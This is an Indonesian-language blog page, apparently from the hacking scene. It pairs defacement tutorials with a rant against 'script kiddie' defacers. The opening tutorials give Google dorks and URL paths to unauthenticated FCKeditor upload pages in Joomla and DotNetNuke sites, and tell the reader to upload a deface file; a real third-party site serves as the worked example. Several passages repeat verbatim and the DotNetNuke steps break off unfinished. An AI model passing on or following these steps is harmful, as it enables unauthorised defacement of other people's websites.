- cari digoogle dengan dork inurl:index.php?option=com_content contoh ane dapet http://www.thomaskoetzing.de/index.php?option=com_content&task=view&id=57&Itemid=97
- kemudian hapus index.php?option=com_content&task=view&id=57&Itemid=97 ganti dengan mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?T
ype=File&Connector=connectors/php/connector.php maka jadiny http://www.thomaskoetzing.de/mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php akan muncul halaman/ form untuk upload file maukkan file deface anda. ingat type file yang bisa di upload berbeda-beda. nah disini ane cuma buat coba² jadi ane masukin file txt.
Joomla mambots File Upload Vulnerability
Deface Ala DotNetNuke Exploit
1. Siapkan file deface anda
2.mencari target web
dork >> inurl:”/portals/0″
search di google...!!
3. jalankan aksi
setelah kita search digoole dan menemukan target
contoh >> http://www.sitetarget.org/portals/0/News.htm << Target sekarang ganti "portals/0/News.htm" dengan >> Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
2.mencari target web
dork >> inurl:”/portals/0″
search di google...!!
3. jalankan aksi
setelah kita search digoole dan menemukan target
contoh >> http://www.sitetarget.org/portals/0/News.htm << Target sekarang ganti "portals/0/News.htm" dengan >> Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Apakah Loe Pantas disebut Hacker ??
<!-- / icon and title --> <!-- message -->
Maaf sebelumnya kalo tulisan saya ini membuat anda tersinggung
Setiap hari exploit demi exploit terus di publikasi di situs² underground para hacker., Setiap hari selalu aja gw liat satu persatu situs mulai berjatuhan dan halaman index mereka telah berubah secara frontal dengan background rata² berwarna hitam dengan tulisan “Hacked by”!!, Mereka yg mulai kenal dengan istilah Hacker mulai mencari berpuluh puluh tutorial di internet tentang cara mendeface situs., mencoba bertanya di milis., forum., hingga bertanya langsung pada sang defacer via chating., dan mereka hanya mendapatkan jawaban “saya bukan hacker kaka”, “Hacker apaan sey omz”, “saya cupu om, ga bisa apa², salah orang situ klo nanya sama saya”!!, yap.., sebuah statement merendahkan diri menaikan mutu dari seorang defacer kacangan yg mengaku hacker., 4 tahun lebih gw terjun di dunia perhackingan., dan melihat scene hacking khususnya di indonesia., apa yg gw liat tentang hacking situs selama ini di lakukan bukan oleh seorang hacker., bahkan seorang kracker., mereka hanya seorang script kiddies yg hanya menyombongkan diri dari hasil deface mereka., dan mereka berbangga dalam hati mereka dan menyebut diri mereka “I am Hacker”…._
Maaf sebelumnya kalo tulisan saya ini membuat anda tersinggung
Setiap hari exploit demi exploit terus di publikasi di situs² underground para hacker., Setiap hari selalu aja gw liat satu persatu situs mulai berjatuhan dan halaman index mereka telah berubah secara frontal dengan background rata² berwarna hitam dengan tulisan “Hacked by”!!, Mereka yg mulai kenal dengan istilah Hacker mulai mencari berpuluh puluh tutorial di internet tentang cara mendeface situs., mencoba bertanya di milis., forum., hingga bertanya langsung pada sang defacer via chating., dan mereka hanya mendapatkan jawaban “saya bukan hacker kaka”, “Hacker apaan sey omz”, “saya cupu om, ga bisa apa², salah orang situ klo nanya sama saya”!!, yap.., sebuah statement merendahkan diri menaikan mutu dari seorang defacer kacangan yg mengaku hacker., 4 tahun lebih gw terjun di dunia perhackingan., dan melihat scene hacking khususnya di indonesia., apa yg gw liat tentang hacking situs selama ini di lakukan bukan oleh seorang hacker., bahkan seorang kracker., mereka hanya seorang script kiddies yg hanya menyombongkan diri dari hasil deface mereka., dan mereka berbangga dalam hati mereka dan menyebut diri mereka “I am Hacker”…._
Langganan:
Postingan (Atom)
